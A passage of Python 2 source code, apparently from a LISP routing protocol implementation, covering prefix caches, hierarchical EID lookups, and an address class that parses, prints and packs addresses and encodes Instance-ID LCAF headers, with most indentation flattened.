if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache_sorted = self.sort_in_entry(self.cache_sorted, ml)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry in self.cache[ml].entries.values():
if (prefix.is_more_specific(entry.eid)): found = entry
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for entry in self.cache[ml].entries.values():
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def sort_in_entry(self, table, value):
if (table == []): return([value])
t = table
while (True):
if (len(t) == 1):
if (value == t[0]): return(table)
index = table.index(t[0])
if (value < t[0]):
return(table[0:index] + [value] + table[index::])
#endif
if (value > t[0]):
return(table[0:index+1] + [value] + table[index+1::])
#endif
#endif
index = len(t) / 2
t = t[0:index] if (value < t[index]) else t[index::]
#endwhile
return([])
#enddef
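    #
    # Illustrative example (not executed) of the binary insertion done by
    # sort_in_entry() above:
    #
    #   sort_in_entry([0, 8, 24], 16) returns [0, 8, 16, 24]
    #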
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
    # more-specifics, this entry will not be returned if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
    # not find 2.2.2.2, what is returned is 224.1.1.1/32 and not 224.0.0.0/4.
#
    # So we will look at the returned entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a Python peculiarity when shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
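# Illustrative usage (not executed), assuming an IPv4 EID in instance-ID
# 1000:
#
#   eid = lisp_address(LISP_AFI_IPV4, "10.1.1.1", 32, 1000)
#   eid.print_address() returns "[1000]10.1.1.1"
#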
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
        # There is a common IPv6 address input mistake that can occur.
        # The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
        # Allow the user to specify ff::/8, which places the ff byte in the
        # high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
            #endif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
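    # As an illustrative example, [1000]10.1.1.0/24 is more specific than
    # [1000]10.0.0.0/8, so is_more_specific() returns True. The instance-IDs
    # must match (unless 'prefix' is the ultimate-root or an IID range) and
    # the address must fall inside the covering prefix.
    #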
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
